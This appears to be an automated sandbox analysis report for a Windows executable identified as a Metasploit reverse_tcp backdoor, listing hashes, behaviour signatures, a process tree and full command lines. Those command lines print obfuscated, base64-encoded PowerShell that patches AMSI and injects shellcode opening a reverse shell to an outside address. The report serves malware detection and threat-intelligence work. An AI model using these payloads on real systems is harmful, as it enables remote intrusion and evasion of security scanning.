metasploit | e6cdeecd1d4522ae7cd1dab0322d228c5209cb76e45a8b6d5ec57b2d5ff6497e

Analysis

max time kernel
45s
max time network
54s
platform
windows7_x64
resource
win7-20220414-en
submitted
16-05-2022 04:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e6cdeecd1d4522ae7cd1dab0322d228c5209cb76e45a8b6d5ec57b2d5ff6497e.exe
Size

129KB
MD5

a6e88ded6626b4bcdf72302efb08f7a7
SHA1

b94ca9879898b781d7e482f1d0acdf96245e0c19
SHA256

e6cdeecd1d4522ae7cd1dab0322d228c5209cb76e45a8b6d5ec57b2d5ff6497e
SHA512

e42838d965a64550cb8477a4899cecfe7f47ebdb5731fe6f7ad3268e047c325322ad31cbe32413a422f2470ceb250420f8547a2bc243aaf6364be37ea6d33a9c

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_tcp

192.168.1.104:4443

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1764 powershell.exe
1128 powershell.exe
432 powershell.exe
1828 powershell.exe
1980 powershell.exe

pid	process
1764	powershell.exe
1128	powershell.exe
432	powershell.exe
1828	powershell.exe
1980	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeDebugPrivilege	432	powershell.exe
Token: SeDebugPrivilege	1828	powershell.exe
Token: SeDebugPrivilege	1980	powershell.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

e6cdeecd1d4522ae7cd1dab0322d228c5209cb76e45a8b6d5ec57b2d5ff6497e.execmd.exepowershell.exepowershell.execsc.exepowershell.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 1644 wrote to memory of 1832	1644	e6cdeecd1d4522ae7cd1dab0322d228c5209cb76e45a8b6d5ec57b2d5ff6497e.exe	cmd.exe
PID 1644 wrote to memory of 1832	1644	e6cdeecd1d4522ae7cd1dab0322d228c5209cb76e45a8b6d5ec57b2d5ff6497e.exe	cmd.exe
PID 1644 wrote to memory of 1832	1644	e6cdeecd1d4522ae7cd1dab0322d228c5209cb76e45a8b6d5ec57b2d5ff6497e.exe	cmd.exe
PID 1832 wrote to memory of 1764	1832	cmd.exe	powershell.exe
PID 1832 wrote to memory of 1764	1832	cmd.exe	powershell.exe
PID 1832 wrote to memory of 1764	1832	cmd.exe	powershell.exe
PID 1764 wrote to memory of 1128	1764	powershell.exe	powershell.exe
PID 1764 wrote to memory of 1128	1764	powershell.exe	powershell.exe
PID 1764 wrote to memory of 1128	1764	powershell.exe	powershell.exe
PID 1128 wrote to memory of 1296	1128	powershell.exe	csc.exe
PID 1128 wrote to memory of 1296	1128	powershell.exe	csc.exe
PID 1128 wrote to memory of 1296	1128	powershell.exe	csc.exe
PID 1296 wrote to memory of 672	1296	csc.exe	cvtres.exe
PID 1296 wrote to memory of 672	1296	csc.exe	cvtres.exe
PID 1296 wrote to memory of 672	1296	csc.exe	cvtres.exe
PID 1832 wrote to memory of 432	1832	cmd.exe	powershell.exe
PID 1832 wrote to memory of 432	1832	cmd.exe	powershell.exe
PID 1832 wrote to memory of 432	1832	cmd.exe	powershell.exe
PID 432 wrote to memory of 1828	432	powershell.exe	powershell.exe
PID 432 wrote to memory of 1828	432	powershell.exe	powershell.exe
PID 432 wrote to memory of 1828	432	powershell.exe	powershell.exe
PID 1828 wrote to memory of 1980	1828	powershell.exe	powershell.exe
PID 1828 wrote to memory of 1980	1828	powershell.exe	powershell.exe
PID 1828 wrote to memory of 1980	1828	powershell.exe	powershell.exe
PID 1980 wrote to memory of 1488	1980	powershell.exe	csc.exe
PID 1980 wrote to memory of 1488	1980	powershell.exe	csc.exe
PID 1980 wrote to memory of 1488	1980	powershell.exe	csc.exe
PID 1488 wrote to memory of 1192	1488	csc.exe	cvtres.exe
PID 1488 wrote to memory of 1192	1488	csc.exe	cvtres.exe
PID 1488 wrote to memory of 1192	1488	csc.exe	cvtres.exe
PID 1980 wrote to memory of 1084	1980	powershell.exe	dw20.exe
PID 1980 wrote to memory of 1084	1980	powershell.exe	dw20.exe
PID 1980 wrote to memory of 1084	1980	powershell.exe	dw20.exe

C:\Users\Admin\AppData\Local\Temp\e6cdeecd1d4522ae7cd1dab0322d228c5209cb76e45a8b6d5ec57b2d5ff6497e.exe
"C:\Users\Admin\AppData\Local\Temp\e6cdeecd1d4522ae7cd1dab0322d228c5209cb76e45a8b6d5ec57b2d5ff6497e.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1644

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BA5.tmp\BA6.tmp\BB7.bat C:\Users\Admin\AppData\Local\Temp\e6cdeecd1d4522ae7cd1dab0322d228c5209cb76e45a8b6d5ec57b2d5ff6497e.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /w 1 /C "sv hAo -;sv XcN ec;sv GXk ((gv hAo).value.toString()+(gv XcN).value.toString());powershell (gv GXk).value.toString() ('JAB3AGgAVgB1AHoAdABjAEcAUgBHACAAPQAgAEAAIgAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlACIAKwAiAHIAIgArACIAbgBlAGwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzACgASQBuAHQAUAB0AHIAIABoAE0AbwBkAHUAbABlACwAIABzAHQAcgBpAG4AZwAgAHAAcgBvAGMATgBhAG0AZQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlACIAKwAiAHIAIgArACIAbgBlAGwAMwAyACIAKQBdACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABMAG8AYQBkAEwAaQBiAHIAYQByAHkAKABzAHQAcgBpAG4AZwAgAG4AYQBtAGUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQAiACsAIgByACIAKwAiAG4AZQBsADMAMgAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIABVAEkAbgB0AFAAdAByACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwATgBlAHcAUAByAG8AdABlAGMAdAAsACAAbwB1AHQAIAB1AGkAbgB0ACAAbABwAGYAbABPAGwAZABQAHIAbwB0AGUAYwB0ACkAOwB9AAoAIgBAAAoAQQBkAGQALQBUAHkAcABlACAAJAB3AGgAVgB1AHoAdABjAEcAUgBHADsAJABiAHYAegBqAEoAQwBpAFcAegAgAD0AIABbAFcAaQBuADMAMgBdADoAOgBHAGUAdABQAHIAbwBjAEEAZABkAHIAZQBzAHMAKABbAFcAaQBuADMAMgBdADoAOgBMAG8AYQBkAEwAaQBiAHIAYQByAHkAKAAiAEEAbQBzAGkALgBkAGwAIgArACIAbAAiACsAIgAiACkALAAgACIAQQBtAHMAaQBTACIAKwAiAGMAIgArACIAYQBuAEIAdQBmAGYAZQByACIAKQA7ACQATgBDAFgAcQBLAHkAeQBqACAAPQAgADAAOwBbAFcAaQBuADMAMgBdADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAGIAdgB6AGoASgBDAGkAVwB6ACwAIABbAHUAaQBuAHQAMwAyAF0AWwB1AGkAbgB0ADMAMgBdADUALAAgADAAeAA0ADAALAAgAFsAcgBlAGYAXQAkAE4AQwBYAHEASwB5AHkAagApADsAJABPAHgAWgBDAEYAbgBOACAAPQAgACgAIgB9AEIAOAAsACAAfQA1ADcALAAgAH0AMAAwACwAIAB9ADAANwAsACAAfQA4ADAALAAgAH0AQwAzACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACAAIgAwAHgAIgApADsAJABPAHgAWgBDAEYAbgBOACAAPQAgAFsAQgB5AHQAZQBbAF0AXQAoACQATwB4AFoAQwBGAG4ATgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAE8AeABaAEMARgBuAE4ALAAgADAALAAgACQAYgB2AHoAagBKAEMAaQBXAHoALAAgADYAKQA=')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JAB3AGgAVgB1AHoAdABjAEcAUgBHACAAPQAgAEAAIgAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlACIAKwAiAHIAIgArACIAbgBlAGwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzACgASQBuAHQAUAB0AHIAIABoAE0AbwBkAHUAbABlACwAIABzAHQAcgBpAG4AZwAgAHAAcgBvAGMATgBhAG0AZQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlACIAKwAiAHIAIgArACIAbgBlAGwAMwAyACIAKQBdACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABMAG8AYQBkAEwAaQBiAHIAYQByAHkAKABzAHQAcgBpAG4AZwAgAG4AYQBtAGUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQAiACsAIgByACIAKwAiAG4AZQBsADMAMgAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIABVAEkAbgB0AFAAdAByACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwATgBlAHcAUAByAG8AdABlAGMAdAAsACAAbwB1AHQAIAB1AGkAbgB0ACAAbABwAGYAbABPAGwAZABQAHIAbwB0AGUAYwB0ACkAOwB9AAoAIgBAAAoAQQBkAGQALQBUAHkAcABlACAAJAB3AGgAVgB1AHoAdABjAEcAUgBHADsAJABiAHYAegBqAEoAQwBpAFcAegAgAD0AIABbAFcAaQBuADMAMgBdADoAOgBHAGUAdABQAHIAbwBjAEEAZABkAHIAZQBzAHMAKABbAFcAaQBuADMAMgBdADoAOgBMAG8AYQBkAEwAaQBiAHIAYQByAHkAKAAiAEEAbQBzAGkALgBkAGwAIgArACIAbAAiACsAIgAiACkALAAgACIAQQBtAHMAaQBTACIAKwAiAGMAIgArACIAYQBuAEIAdQBmAGYAZQByACIAKQA7ACQATgBDAFgAcQBLAHkAeQBqACAAPQAgADAAOwBbAFcAaQBuADMAMgBdADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAGIAdgB6AGoASgBDAGkAVwB6ACwAIABbAHUAaQBuAHQAMwAyAF0AWwB1AGkAbgB0ADMAMgBdADUALAAgADAAeAA0ADAALAAgAFsAcgBlAGYAXQAkAE4AQwBYAHEASwB5AHkAagApADsAJABPAHgAWgBDAEYAbgBOACAAPQAgACgAIgB9AEIAOAAsACAAfQA1ADcALAAgAH0AMAAwACwAIAB9ADAANwAsACAAfQA4ADAALAAgAH0AQwAzACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACAAIgAwAHgAIgApADsAJABPAHgAWgBDAEYAbgBOACAAPQAgAFsAQgB5AHQAZQBbAF0AXQAoACQATwB4AFoAQwBGAG4ATgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAE8AeABaAEMARgBuAE4ALAAgADAALAAgACQAYgB2AHoAagBKAEMAaQBXAHoALAAgADYAKQA=
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1128

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nzz1uoa2.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:1296

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1D91.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1D90.tmp"
6⤵
PID:672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /w 1 /C "sv hAo -;sv XcN ec;sv GXk ((gv hAo).value.toString()+(gv XcN).value.toString());powershell (gv GXk).value.toString() ('JABRAGcAPQAnACQAQwBRAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawAiACsAIgBlACIAKwAiAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAIgArACIAZQAiACsAIgByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABGAEwARAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAUwByAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGQAMgAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQAzADEALAB9AGYAZgAsAH0AOABiACwAfQA3ADIALAB9ADIAOAAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA1ADAALAB9ADgAYgAsAH0ANAA4ACwAfQAxADgALAB9ADgAYgAsAH0ANQA4ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AMwAxACwAfQBmAGYALAB9ADgAYgAsAH0AMwA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGMAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AYQBjACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQBjADAALAB9AGEAOAAsAH0AMAAxACwAfQA2ADgALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADEAMQAsAH0ANQBiACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABhACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0AZQA4ACwAfQA2ADcALAB9ADAAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAYQAsAH0AMAAwACwAfQA2AGEALAB9ADAANAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AMAAyACwAfQBkADkALAB9AGMAOAAsAH0ANQBmACwAfQBmAGYALAB9AGQANQAsAH0AOAAzACwAfQBmADgALAB9ADAAMAAsAH0ANwBlACwAfQAzADYALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsA'+'H0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAMwAsAH0AZgA4ACwAfQAwADAALAB9ADcAZAAsAH0AMgA4ACwAfQA1ADgALAB9ADYAOAAsAH0AMAAwACwAfQA0ADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADAAMAAsAH0ANQAwACwAfQA2ADgALAB9ADAAYgAsAH0AMgBmACwAfQAwAGYALAB9ADMAMAAsAH0AZgBmACwAfQBkADUALAB9ADUANwAsAH0ANgA4ACwAfQA3ADUALAB9ADYAZQAsAH0ANABkACwAfQA2ADEALAB9AGYAZgAsAH0AZAA1ACwAfQA1AGUALAB9ADUAZQAsAH0AZgBmACwAfQAwAGMALAB9ADIANAAsAH0AMABmACwAfQA4ADUALAB9ADcAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0AZQA5ACwAfQA5AGIALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBjADEALAB9AGMAMwAsAH0AYgBiACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA1ADMALAB9AGYAZgAsAH0AZAA1ACIAOwAkAEoAaAA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQAQwBRACAALQBOAGEAbQBlACAAIgBPAEMAIgAgAC0AbgBhAG0AZQBzACAAdABKAFEAOwAkAEoAaAA9ACQASgBoAC4AcgBlAHAAbABhAGMAZQAoACIAdABKAFEAIgAsACAAIgBXAGkAbgAzADIARgB1AG4AYwB0AGkAbwAiACsAIgBuACIAKwAiAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQAUwByACAAPQAgACQAUwByAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgBjAHMAWQBkAHgAIgApAC4AcgBlAHAAbABhAGMAZQAoACIAYwBzAFkAZAAiACwAIAAiADAAIgApAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACQAZQBuAD0AMAB4ADEAMAAwADIAOwBpAGYAIAAoACQAUwByAC4ATAAgAC0AZwB0ACAAMAB4ADEAMAAwADIAKQB7ACQAZQBuAD0AJABTAHIALgBMAH0AOwAkAEIAdQA9ACQASgBoADoAOgBjAGEAbABsAG8AYwAoADAAeAAxADAAMAAyACwAIAAxACkAOwBbAFUASQBuAHQANgA0AF0AJABGAEwARAAgAD0AIAAwADsAZgBvAHIAKAAkAEIAcAA9ADAAOwAkAEIAcAAgAC0AbABlACgAJABTAHIALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAQgBwACsAKwApAHsAJABKAGgAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABCAHUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAQgBwACkALAAgACQAUwByAFsAJABCAHAAXQAsACAAMQApAH0AOwAkAEoAaAA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABCAHUALAAgADAAeAAxADAAMAAyACwAIAAwAHgANAAwACwAIABbAFIAZQBmAF0AJABGAEwARAApADsAJABsAGUAVwA9AFsAaQBuAHQAXQAwAHgAMAAwADsAJABKAGgAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAWwB1AGkAbgB0ADMAMgBdAFsAaQBuAHQAXQAwACwAJABsAGUAVwAsACQAQgB1ACwAMAAsADAALAAwACkAOwAnADsAJABHAGgAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAFEAZwApACkAOwAkAGEAYgA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABTAEYAPQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQAZAB1AE0AIAA9ACAAIgBDADoAXAAkAFMARgBcAHQAdAB3AFgARgBSAE4ASABcACQAUwBGACQAYQBiAFwAdgAxAC4AMABcACQAYQBiACIAOwAkAGQAdQBNACAAPQAgACQAZAB1AE0ALgByAGUAcABsAGEAYwBlACgAIgB0AHQAdwBYACIALAAgACIAcwB5AHMAIgApADsAJABkAHUATQAgAD0AIAAkAGQAdQBNAC4AcgBlAHAAbABhAGMAZQAoACIARgBSAE4ASAAiACwAIAAiAHcAbwB3ADYANAAiACkAOwAkAEwAVgB2ACAAPQAgACcAVAByAHUAIgArACIAZQAiACsAIgAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAEwAVgB2ACcAKQB7ACQAYQBiAD0AIAAkAGQAdQBNAH0AOwAkAHcAWgA9ACIAIAAkAGEAYgAgAHUAaABFACAAJABHAGgAIgA7ACQAdwBaAD0AJAB3AFoALgByAGUAcABsAGEAYwBlACgAIgB1AGgARQAiACwAIAAiAC0AbgBvAGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAHcAWgA=')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
